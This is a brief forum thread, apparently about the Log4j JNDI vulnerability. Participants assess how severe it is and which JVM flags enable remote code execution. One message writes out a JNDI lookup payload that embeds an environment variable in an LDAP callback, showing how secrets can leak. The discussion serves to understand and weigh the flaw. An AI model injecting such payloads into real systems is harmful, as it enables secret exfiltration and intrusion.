[brasetvik]

That's good clarification, thanks.

I got the POC to RCE with `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true` seeming sufficient.

While still not great, I'd expect that to meaningfully reduce the severity for most, as that seems a pretty … odd option to enable.

[Fabricio20]

If you check the argument, one is for RMI and the other is for LDAP, if your PoC uses LDAP then you need the LDAP one, else RMI, etc.. But yes, most people probably don't have this enabled, so the only concern is a pingback in modern java.

[ryan_lane]

Pingback can also include variable contents, so it's not just "they can get the IPs", but also potentially secrets and such.

[brasetvik]

Yeah, `${jndi:ldap://127.0.0.1:1389/o=${env:PATH}}`